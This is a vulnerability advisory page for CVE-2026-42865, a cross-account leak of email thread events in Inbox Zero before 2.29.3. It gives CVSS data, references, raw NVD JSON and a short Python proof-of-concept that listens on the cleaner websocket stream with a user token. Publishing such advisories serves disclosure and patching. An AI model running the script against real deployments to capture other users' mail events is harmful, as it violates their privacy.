CVE-2026-42865

Description

Inbox Zero is an AI personal assistant for email. Prior to 2.29.3, the cleaner email stream endpoint used a shared Redis subscription listener, which could deliver thread events for one authenticated account to another authenticated account using the cleaner feature at the same time. This vulnerability is fixed in 2.29.3.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getinboxzero:inbox_zero:*:*:*:*:*:*:*:* - VULNERABLE

Inbox Zero < 2.29.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import asyncio
import websockets

# Proof of Concept for CVE-2026-42865
# This script simulates connecting to the vulnerable stream endpoint.
# Due to the shared Redis subscription listener, data leakage occurs
# when multiple authenticated users interact with the cleaner feature simultaneously.

async def victim_stream_listener(stream_url, auth_token):
    headers = {"Authorization": f"Bearer {auth_token}"}
    async with websockets.connect(stream_url, extra_headers=headers) as websocket:
        print(f"[*] Connected to stream as {auth_token[:10]}...")
        while True:
            try:
                message = await websocket.recv()
                # In the vulnerable version, this message might contain
                # thread events belonging to a different user.
                print(f"[!] Received Event: {message}")
            except Exception as e:
                print(f"Error: {e}")
                break

# Usage:
# Attacker initiates two connections with different user tokens.
# Trigger the 'cleaner' action on one account and observe data leakage
# in the other connection's stream.
# TARGET_URL = "wss://inbox-zero-app.com/api/stream/cleaner"
# asyncio.run(victim_stream_listener(TARGET_URL, "ATTACKER_TOKEN"))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42865
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42865
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42865/
[4] VulDB https://vuldb.com/cve/CVE-2026-42865
[5] https://github.com/elie222/inbox-zero/commit/02341923b5460ce9630c4681a9b6461ba466688a
[6] https://github.com/elie222/inbox-zero/security/advisories/GHSA-f3gp-v7cj-2569

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42865", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:36.683", "lastModified": "2026-05-21T18:03:57.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inbox Zero is an AI personal assistant for email. Prior to 2.29.3, the cleaner email stream endpoint used a shared Redis subscription listener, which could deliver thread events for one authenticated account to another authenticated account using the cleaner feature at the same time. This vulnerability is fixed in 2.29.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getinboxzero:inbox_zero:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29.3", "matchCriteriaId": "96735CCB-CCC9-487F-A5F4-EC379B6CC9D5"}]}]}], "references": [{"url": "https://github.com/elie222/inbox-zero/commit/02341923b5460ce9630c4681a9b6461ba466688a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/elie222/inbox-zero/security/advisories/GHSA-f3gp-v7cj-2569", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}